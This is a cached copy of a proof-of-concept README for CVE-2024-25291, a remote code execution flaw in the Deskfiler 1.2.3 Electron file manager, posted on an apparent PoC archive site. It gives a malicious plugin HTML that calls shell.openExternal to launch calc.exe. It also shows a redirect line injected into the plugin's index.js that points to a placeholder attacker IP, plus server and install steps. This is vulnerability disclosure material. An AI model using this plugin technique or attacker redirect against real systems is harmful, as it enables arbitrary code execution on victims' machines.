Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-25291 PoC — Deskfiler 安全漏洞

Source
https://github.com/EQSTLab/CVE-2024-25291
Associated Vulnerability
Title:Deskfiler 安全漏洞 (CVE-2024-25291)
Description:Deskfiler是一个桌面文件管理器。 Deskfiler v1.2.3版本存在安全漏洞,该漏洞源于允许攻击者通过上传特制的插件来执行任意代码。
Description
PoC for CVE-2024-25291
Readme
# DeskFiler RCE

A Proof-Of-Concept for CVE-2024-25291 vulnerability. <br><br>
deskfiler - 1.2.3 allows Electron webview in application, with resultant remote code 
In this repository there is an example vulnerable application and proof-of-concept (POC) exploit of it.

As a PoC there is a python file that automates the process. 
---------------------------------------

#### 1.Vunerability Overview:
 * Vulnerability Subject: Open Redirect via RCE
 * Vulnerability Version: deskfiler-1.2.3
 * Manifestation of the Issue: Electron Webview
 * Attack Type: Remote Code Execution
 * Attack Vectors: To exploit vulnerability, someone must open plug-in.
 * Reserved CVE Number: CVE-2024-25291 

---------------------------------------

#### 2. Vulnerability Cause:
* Exploit explain
  *  In a specific section within the application, a section accessing an external link through a Webview through an electron could be confirmed. Therefore, through this, it is possible to achieve an RCE by connecting to the attacker's server

Proof-of-concept (POC)
----------------------
* Step 1) Prepare the attacker's server and make Malicious Plug-in.
```html
<html>
 <head>
 <title>jruru</title>
 </head>
 <body>
 <script>
 const { shell } = require('electron');
 shell.openExternal('file:C:/Windows/System32/calc.exe');
 </script>
 </body>
 </html>
```

※ If you want to test it quickly, create a server on the attacker's PC with the following code.

```py
$ python -m http.server 80
```

**Note:** ※ At this time, it is assumed that the plug-in is a plug-in generated by the attacker, and is only a normal plug-in with a code added to let the attacker server access. BareBone has been selected for simple testing
![deskfiler1](https://github.com/QnA4u/CVE/assets/131337101/b03cddf8-0656-4b14-8dbc-807e40673730)

Afterward, add the following code to the index.js file in the BareBone folder path.
```py
window.location='http://[attacker_ip]/hack.html'
```

* Step 2) On the victim's server, execute Deskfiler and install the BareBone plugin through "Add new plugin."
![deskfiler2](https://github.com/QnA4u/CVE/assets/131337101/5b351a9d-7fdd-4b89-b73b-7bfd01f3d9a4)

![deskfiler3](https://github.com/QnA4u/CVE/assets/131337101/059ed94e-df61-4c78-800d-60e8db442696)

---------------------------------------

### 3. Additional Information
 In this PoC, we utilized a plug-in; however, we believe that with alternative attack vectors, achieving Remote Code Execution (RCE) independently is possible. Additionally, if server-side vulnerabilities such as Stored XSS, Reflected XSS, exist, RCE is also considered feasible.
File Snapshot

 [4.0K]  /data/pocs/9bceba585fdb1f9d198e58485405dbe5b20396eb
├── [ 193]  jruru.html
└── [2.5K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.